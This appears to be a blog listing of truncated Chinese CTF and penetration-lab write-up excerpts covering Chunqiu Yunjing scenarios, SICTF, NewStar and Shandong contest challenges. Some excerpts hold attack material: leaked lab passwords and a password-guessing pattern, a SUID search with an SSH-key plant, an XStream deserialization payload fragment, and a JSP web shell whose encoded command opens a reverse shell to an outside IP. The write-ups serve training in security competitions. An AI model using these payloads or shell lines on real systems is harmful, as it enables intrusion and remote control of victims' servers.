春秋云镜-ThermalPower
春秋云镜-ThermalPowerflag01fscan开扫
蚁剑马写进去连不上,选择冰蝎马
flag02
发现ftp可连接,新主机
1172.22.17.6 WORKGROUP\WIN-ENGINEER
上代理
挨个看看发现敏感信息
123WIN-SCADA: 172.22.26.xxUsername: AdministratorPassword: IYnT3GyCiy3
结合内部通知可推断出登录账号密码为
账户名+@+工号
chenhua/chenhua@0813zhaoli/zhaoli@0821wangning/wangning@0837zhangling/zhangling@0871zhangying/zhangying@0888wangzhiqiang/wangzhiqiang@0901chentao/chentao@0922zhouyong/zhouyong@0939lilong/lilong@1046liyumei/liyumei@1048 ...
春秋云镜-Hospital
春秋云镜-Hospitalflag01
存在actuator接口泄露
发现存在堆栈文件heapdump
不理解我用heapdump找出来的多一个G
GAysjAQhG7/sDKQlVpR2g==
1GAYysgMQhG7/CzIJlVpR2g==
12find / -perm -u=s -type f 2>/dev/nullvim.basic /root/.ssh/authorized_keys
flag02老规矩线上frpc和fscan
1234567891011121314151617181920212223242526272829303132172.30.12.5:22 open172.30.12.5:8080 open[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=428F99DD26B28B10CAF2F658CA6D7510[*] WebT ...
春秋云镜-Delivery
春秋云镜-Deliveryflag01
请测试 Delivery 暴露在公网上的 Web 应用的安全性,并尝试获取在该服务器上执行任意命令的能力。
fscan扫一下
发现存在ftp的弱口令
连上看看
1.txt里没内容
pom.xml:
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ld ...
2024SICTF
2024SICTFMISC签到Picture将一个图片的像素点分成了两个图片的像素点
gpt嗦一个脚本
12345678910111213141516171819202122232425262728from PIL import Image# 打开加密图像和分离图像image1 = Image.open('flag1.png')image2 = Image.open('flag2.png')# 获取图像的大小width, height = image1.size# 创建一个新的图像用于保存解密后的结果decrypted_image = Image.new(mode="RGB", size=image1.size)# 遍历每个像素并恢复原始图像for i in range(width): for j in range(height): tr, tg, tb = image1.getpixel((i, j)) r2, g2, b2 = image2.getpixel((i, j)) ...
2024NewStar
2024NewStarWeek2刚刚把Web做完
质量嘎嘎的
写一写
Miscwireshark_checkin随便找找就有flag了
wireshark_secret第3流发现图片
导出来
Web你能在一秒内打出八句英文吗1234567891011121314151617181920212223242526272829from selenium import webdriverfrom selenium.webdriver.common.by import Byimport time# 使用 Chrome 浏览器driver = webdriver.Chrome()# 打开网页driver.get("http://localhost:5000") # 替换成你要访问的页面 URL# 找到提供句子的 <p> 元素并获取文本sentences_element = driver.find_element(By.ID, "text")sentences = sentences_element.text # 获取句子文本# 找到输入框元 ...
Postgres盲注--K神倾情赞助
8e3ebc604238f4d42f11100dccf9ed7389b636ce6cf810d5d9966f86ee953d2de2f753fd9ada4a4d37680e7b31d4751bfa2fb6c8e415257f04dcfb6a80f24e34f08edad5142dda958a8a240096e9b303cd285bd9a52018872c2eb58c018e12a98fd1ca66384b2915cb26af38ff405dbe296a65aab42c6b8237104951fc7d9c40a8dd94618367fc897d2b2cf4b0cdb12a8fe389d6a8bfeb44634511241209218859c5ceaf5fbbf17cd66d7a3cec72a9094d709a20941ae6639d1d12959b11318fa03fab38b4094231c0bb470c731aae749d1536646649de57c1521d0d1a166ff10f5c23ff5422a2d8f11bf2b3c9439040eac04a3c28d8b8685 ...
2024山东省赛wp
2024山东省赛wpMisc签到直接交flag
ezpic010打开文件尾有一半flag
另一半在blue plane 0
flag{cf74bc8a2233179ea73b2de7499d614c}
简单编码1DJ?ELCaecBfBa?eeCAAB`BD?A`fgBghDChab_N
题目描述是60=?+?
想到base,但是加起来没有60的哇,然后就想到了rot47+13
异常的流量这题意难平了,我的二维码搞得太糊了,ps补得都识别不到。。唉
流量包打开01一看大概率跟二维码有关系
1tshark -r 异常的流量.pcap -T fields -e dns.qry.name
将数据提取出来,但是后面得删除重复的,后面看星爷博客才反应过来加个条件就行,当时比赛还是手提的
1tshark -r 异常的流量.pcap -Y "ip.dst == 172.16.178.145" -T fields -e dns.qry.name
后面手动删除.localhost.dnslog.cn
ctrl+h替换就可
我拼出来的图
看着挺清晰,可是ps识 ...
Polar Misc刷题
0101转二维码,扫描的到密码
p@ssw0rd!
100RGB123456789🐯🐩🐣🐮🐨🐣🐭🐭🐨🐧🐩🐣🐨🐧🐯🐣🐰🐮🐨🐧🐪🐣🐨🐩🐪🐣🐭🐬🐨🐨🐧🐣🐫🐰🐣🐨🐧🐰🐰🐮🐣🐫🐰🐣🐨🐨🐬🐪🐩🐣🐰🐬🐣🐰🐮 🐨🐨🐫🐣🐬🐨🐣🐰🐬🐰🐰🐣🐨🐨🐮🐣🐫🐪🐨🐧🐨🐣🐨🐩🐬🐣🐧
按照字符分割一下
82,71,66,102,108,97,103,123,65110,49,109,97,49,115,32,95,97,114,51,95,99,117,43,101,125,0
ascii转字符串
RGBflag{An1ma1s _ar3_cu+e}
docx瘾写1.字体颜色
flag{I_be1ieve
2.隐藏
3.后缀改为zip
flag{I_be1ieve_y0u_Can_flnd_+h3m}
LSB
爆破鬼才
binwalk分离出压缩包爆破密码
大礼包8为密码爆破
9635421
图片末尾
MMZDKN2ZNZNHSTKWHB3WKW ...
山东省大学生网络安全技能大赛 爱好者线上选拔赛Wp
山东省大学生网络安全技能大赛 爱好者线上选拔赛wp录屏链接:链接:https://pan.baidu.com/s/1e7gLGuhhzEdBPJwUIg4Wgg?pwd=7lzd提取码:7lzd
Misc签到关注大赛公众号「山东省大学生网络安全技能大赛」,回复“flag-sdnisc2024”即可
flag{a4c7f4c35c8f862debb07f2ce5c8afa3}
deepdeep用deeosound打开发现要密码,利用deepsounjohn导出hash
利用John进行密码爆破
010看到提示。密码为pw??????
jhon爆破一下
1john hash.txt --mask=?1?1?1?1?1?1?1?1
deepsond导出为一张图片,
结合题目描述,密码用了不止一次,在册下一次还需要密码
cloacked-pixel解密
WEBez_calc利用脚本回答题目
1234567891011import requestssession = requests.session()r = session.get('http://119.45.42.24 ...
春秋云镜-Spoofing
春秋云镜-Spoofingflag01
进来是个后台管理页面
扫目录发现是tomcat
http://39.101.188.249:8080/docs/
版本是9.0.30
搜索发现存在CNVD-2020-10487漏洞
之前iscc打过,直接利用这个脚本打
但是我们需要有恶意文件才能包含从而获取权限,因此我们需要找到一个上传接口,正好在web.xml中发现接口UploadTestServlet,访问发现是上传文件接口,上传反弹shell文件,内容如下
1<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(&q ...